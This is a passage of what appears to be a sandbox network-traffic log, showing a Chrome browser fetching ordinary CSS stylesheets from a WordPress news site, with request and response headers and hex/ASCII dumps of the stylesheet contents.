                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:42 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:40 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 6840
                                                        Connection: close
                                                        Last-Modified: Fri, 21 Feb 2025 19:55:26 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:42 UTC6840INData Raw: 2f 2a 0a 0a 54 48 49 53 20 46 49 4c 45 20 49 53 20 4f 56 45 52 57 52 49 54 54 45 4e 20 45 56 45 52 59 20 54 49 4d 45 20 59 4f 55 20 55 50 44 41 54 45 20 54 48 45 20 50 4c 55 47 49 4e 2e 0a 55 53 45 20 54 48 45 20 43 55 53 54 4f 4d 20 43 53 53 20 4f 50 54 49 4f 4e 20 49 4e 20 54 48 45 20 53 55 42 53 43 52 49 50 54 49 4f 4e 20 53 45 54 54 49 4e 47 20 50 41 4e 45 4c 20 46 4f 52 20 59 4f 55 52 0a 43 55 53 54 4f 4d 20 43 53 53 20 52 55 4c 45 53 2e 0a 0a 2a 2f 0a 0a 64 69 76 2e 74 6e 70 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2c 0a 66 6f 72 6d 2e 74 6e 70 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2c 20 66 6f 72 6d 2e 74 6e 70 2d 70 72 6f 66 69 6c 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20
                                                        Data Ascii: /*THIS FILE IS OVERWRITTEN EVERY TIME YOU UPDATE THE PLUGIN.USE THE CUSTOM CSS OPTION IN THE SUBSCRIPTION SETTING PANEL FOR YOURCUSTOM CSS RULES.*/div.tnp-subscription,form.tnp-subscription, form.tnp-profile { display: block; margin: 1em


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449755198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:41 UTC599OUTGET /wp-content/uploads/sites/35/elementor/css/post-3.css?ver=1741370436 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:42 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:40 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 1164
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 18:00:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:42 UTC1164INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 33 7b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 3a 23 36 45 43 31 45 34 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 3a 23 35 34 35 39 35 46 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 74 65 78 74 3a 23 37 41 37 41 37 41 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 3a 23 36 31 43 45 37 30 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 52 6f 62 6f 74 6f 22 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d
                                                        Data Ascii: .elementor-kit-3{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449758198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:41 UTC603OUTGET /wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.6 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:42 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:40 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 254
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 17:59:00 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:42 UTC254INData Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 37 2e 30 20 2d 20 31 38 2d 30 32 2d 32 30 32 35 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 20 61 20 69 6d 67 5b 73 72 63 24 3d 22 2e 73 76 67 22 5d 7b 77 69 64 74 68 3a 34 38 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d
                                                        Data Ascii: /*! elementor - v3.27.0 - 18-02-2025 */.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=".svg"]{width:48px}.elementor-widget-image img{display:inline-block;vertical-align:middle}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449757198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:41 UTC603OUTGET /wp-content/uploads/sites/35/elementor/css/post-12010.css?ver=1741370437 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:42 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:40 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 2842
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 18:00:37 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:42 UTC2842INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 31 32 30 31 30 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 61 33 33 32 33 36 36 7b 2d 2d 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 69 6e 69 74 69 61 6c 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 73 74 72 65 74 63 68 3b 2d 2d 66 6c 65 78 2d 77 72 61 70 2d 6d 6f 62 69 6c 65 3a 77 72 61 70 3b
                                                        Data Ascii: .elementor-12010 .elementor-element.elementor-element-a332366{--display:flex;--flex-direction:row;--container-widget-width:initial;--container-widget-height:100%;--container-widget-flex-grow:1;--container-widget-align-self:stretch;--flex-wrap-mobile:wrap;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449756198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:41 UTC594OUTGET /wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:42 UTC206INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:40 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 604677
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:12:02 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:42 UTC16178INData Raw: 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 46 6f 6e 74 41 77 65 73 6f 6d 65 3b 73 72 63 3a 75 72 6c 28 66 6f 6e 74 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 29 3b 73 72 63 3a 75 72 6c 28 66 6f 6e 74 2f 66 6f 6e 74
                                                        Data Ascii: /*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:FontAwesome;src:url(font/fontawesome-webfont.eot);src:url(font/font
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 36 41 22 7d 2e 66 61 2d 64 72 6f 70 62 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 36 42 22 7d 2e 66 61 2d 73 74 61 63 6b 2d 6f 76 65 72 66 6c 6f 77 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 36 43 22 7d 2e 66 61 2d 69 6e 73 74 61 67 72 61 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 36 44 22 7d 2e 66 61 2d 66 6c 69 63 6b 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 36 45 22 7d 2e 66 61 2d 61 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 37 30 22 7d 2e 66 61 2d 62 69 74 62 75 63 6b 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 46 31 37 31 22 7d 2e 66 61 2d 62 69 74 62 75 63 6b 65 74 2d 73 71 75 61 72 65
                                                        Data Ascii: re{content:"\F16A"}.fa-dropbox:before{content:"\F16B"}.fa-stack-overflow:before{content:"\F16C"}.fa-instagram:before{content:"\F16D"}.fa-flickr:before{content:"\F16E"}.fa-adn:before{content:"\F170"}.fa-bitbucket:before{content:"\F171"}.fa-bitbucket-square
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 2d 6c 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 46 22 7d 2e 6a 65 67 69 63 6f 6e 2d 73 75 6e 6e 79 2d 73 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 47 22 7d 2e 6a 65 67 69 63 6f 6e 2d 74 68 75 6e 64 65 72 73 74 6f 72 6d 2d 6c 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 48 22 7d 2e 6a 65 67 69 63 6f 6e 2d 73 75 6e 6e 79 2d 6e 69 67 68 74 2d 73 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 49 22 7d 2e 6a 65 67 69 63 6f 6e 2d 74 68 75 6e 64 65 72 73 74 6f 72 6d 2d 64 61 79 2d 6c 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 4a 22 7d 2e 6a 65 67 69 63 6f 6e 2d 74 68 75 6e 64 65 72 73 74 6f 72 6d 2d 6e 69 67 68 74 2d 6c 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 4b 22 7d 2e 6a 65 67 69 63 6f 6e 2d 63
                                                        Data Ascii: -lg:before{content:"F"}.jegicon-sunny-sm:before{content:"G"}.jegicon-thunderstorm-lg:before{content:"H"}.jegicon-sunny-night-sm:before{content:"I"}.jegicon-thunderstorm-day-lg:before{content:"J"}.jegicon-thunderstorm-night-lg:before{content:"K"}.jegicon-c
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 32 70 78 20 23 66 66 66 2c 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 3b 63 6f 6c 6f 72 3a 23 33 33 33 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 70 78 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 75 6c 74 69 20 2e 63 68 6f 73 65 6e 2d 63 68 6f 69 63 65 73 20 6c 69 2e 73 65 61 72 63 68 2d 63 68 6f 69 63 65 20 73 70 61 6e 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 75 6c 74 69 20 2e 63 68 6f 73 65 6e 2d 63 68 6f 69 63 65 73 20 6c 69 2e 73 65
                                                        Data Ascii: x;background-clip:padding-box;box-shadow:inset 0 0 2px #fff,0 1px 0 rgba(0,0,0,.05);color:#333;line-height:13px;cursor:default}.chosen-container-multi .chosen-choices li.search-choice span{word-wrap:break-word}.chosen-container-multi .chosen-choices li.se
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 6c 61 74 65 59 28 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 2e 70 73 77 70 2d 2d 74 6f 75 63 68 20 2e 70 73 77 70 5f 5f 73 68 61 72 65 2d 74 6f 6f 6c 74 69 70 20 61 7b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 31 32 70 78 7d 61 2e 70 73 77 70 5f 5f 73 68 61 72 65 2d 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 31 32 70 78 3b 72 69 67 68 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 36 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74
                                                        Data Ascii: lateY(0);-ms-transform:translateY(0);transform:translateY(0)}.pswp--touch .pswp__share-tooltip a{padding:16px 12px}a.pswp__share--facebook:before{content:"";display:block;width:0;height:0;position:absolute;top:-12px;right:15px;border:6px solid transparent
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 2d 73 6d 2d 6f 66 66 73 65 74 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 32 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 33 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 34 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 35 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 36 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 37 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 38 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 39 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 32 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 32 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 31 31 7b 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 36 36 37 25 7d
                                                        Data Ascii: -sm-offset-0{margin-left:0}.vc_col-sm-1,.vc_col-sm-2,.vc_col-sm-3,.vc_col-sm-4,.vc_col-sm-5,.vc_col-sm-6,.vc_col-sm-7,.vc_col-sm-8,.vc_col-sm-9,.vc_col-sm-10,.vc_col-sm-11,.vc_col-sm-12{float:left}.vc_col-sm-12{width:100%}.vc_col-sm-11{width:91.66666667%}
                                                        2025-03-11 18:02:42 UTC16384INData Raw: 64 64 69 6e 67 3a 30 20 31 32 70 78 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 7d 2e 6a 65 67 5f 74 6f 70 62 61 72 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 31 32 31 32 31 3b 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 30 7d 2e 6a 65 67 5f 74 6f 70 62 61 72 2e 64 61 72 6b 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 74 6f 67 67 6c 65 2c 2e 6a 65 67 5f 74 6f 70 62 61 72 2e 64 61 72 6b 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 77 72 61 70 70 65 72 2e 6a 65 67 5f 73 65 61 72 63 68 5f 6e 6f 5f 65 78 70 61 6e 64 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 62 75 74 74 6f 6e 2c 2e 6a 65 67 5f 74 6f 70 62 61 72 2e 64 61 72 6b 20 2e 6a 65 67 5f 73 65 61 72
                                                        Data Ascii: dding:0 12px;border-right:1px solid #e0e0e0}.jeg_topbar.dark{background:#212121;color:#f5f5f5;border-bottom-width:0}.jeg_topbar.dark .jeg_search_toggle,.jeg_topbar.dark .jeg_search_wrapper.jeg_search_no_expand .jeg_search_button,.jeg_topbar.dark .jeg_sear
                                                        2025-03-11 18:02:43 UTC16384INData Raw: 74 28 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 62 6f 78 65 64 29 3a 6e 6f 74 28 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 6d 65 6e 75 62 6f 72 64 65 72 29 20 2e 6a 65 67 5f 6e 61 76 5f 6c 65 66 74 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 70 6f 70 75 70 5f 65 78 70 61 6e 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 66 6f 72 6d 2c 2e 6a 65 67 5f 6e 61 76 62 61 72 3a 6e 6f 74 28 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 62 6f 78 65 64 29 3a 6e 6f 74 28 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 6d 65 6e 75 62 6f 72 64 65 72 29 20 2e 6a 65 67 5f 6e 61 76 5f 6c 65 66 74 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 70 6f 70 75 70 5f 65 78 70 61 6e 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 2e 6a 65 67 5f 73 65 61 72 63 68 5f 72 65 73 75 6c 74 7b 6c 65 66 74 3a
                                                        Data Ascii: t(.jeg_navbar_boxed):not(.jeg_navbar_menuborder) .jeg_nav_left .jeg_search_popup_expand:first-child .jeg_search_form,.jeg_navbar:not(.jeg_navbar_boxed):not(.jeg_navbar_menuborder) .jeg_nav_left .jeg_search_popup_expand:first-child .jeg_search_result{left:
                                                        2025-03-11 18:02:43 UTC16384INData Raw: 65 6e 75 5f 73 74 79 6c 65 5f 34 3e 6c 69 2e 73 66 48 6f 76 65 72 3e 61 2c 2e 6a 65 67 5f 6d 65 6e 75 5f 73 74 79 6c 65 5f 34 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 7d 2e 6a 65 67 5f 6d 65 6e 75 5f 73 74 79 6c 65 5f 34 3e 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 3e 2e 73 66 2d 77 69 74 68 2d 75 6c 3a 61 66 74 65 72 2c 2e 6a 65 67 5f 6d 65 6e 75 5f 73 74 79 6c 65 5f 34 3e 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 2e 73 66 2d 77 69 74 68 2d 75 6c 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 64 61 72 6b 20 2e 6a 65 67 5f 6d 65 6e 75 5f 73 74 79 6c 65 5f 34 3e 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75
                                                        Data Ascii: enu_style_4>li.sfHover>a,.jeg_menu_style_4>li>a:hover{background:#f5f5f5}.jeg_menu_style_4>li.current-menu-ancestor>.sf-with-ul:after,.jeg_menu_style_4>li.current-menu-item>.sf-with-ul:after{color:inherit}.jeg_navbar_dark .jeg_menu_style_4>li.current-menu
                                                        2025-03-11 18:02:43 UTC16384INData Raw: 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 7d 2e 6a 65 67 5f 6d 6f 62 69 6c 65 5f 77 72 61 70 70 65 72 20 2e 77 69 64 67 65 74 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6a 65 67 5f 6d 6f 62 69 6c 65 5f 77 72 61 70 70 65 72 20 2e 77 69 64 67 65 74 20 2e 6a 65 67 5f 61 64 5f 6d 6f 64 75 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6a 65 67 5f 6d 6f 62 69 6c 65 5f 70 72 6f 66 69 6c 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6a 65 67 5f 6d 6f 62 69 6c 65 5f 70 72 6f 66 69 6c 65 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 7d 2e 6a 65 67 5f 6d 6f 62 69 6c 65 5f 70 72 6f 66 69 6c
                                                        Data Ascii: ttom:0;border-bottom:1px solid #eee}.jeg_mobile_wrapper .widget:last-child{border-bottom:0}.jeg_mobile_wrapper .widget .jeg_ad_module{margin-bottom:0}.jeg_mobile_profile{position:relative}.jeg_mobile_profile:first-child{padding-top:30px}.jeg_mobile_profil


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449760198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:42 UTC599OUTGET /wp-content/themes/jnews/assets/css/elementor-frontend.css?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:43 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:41 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 681
                                                        Connection: close
                                                        Last-Modified: Thu, 18 Jul 2024 15:47:24 GMT
                                                        Accept-Ranges: bytes
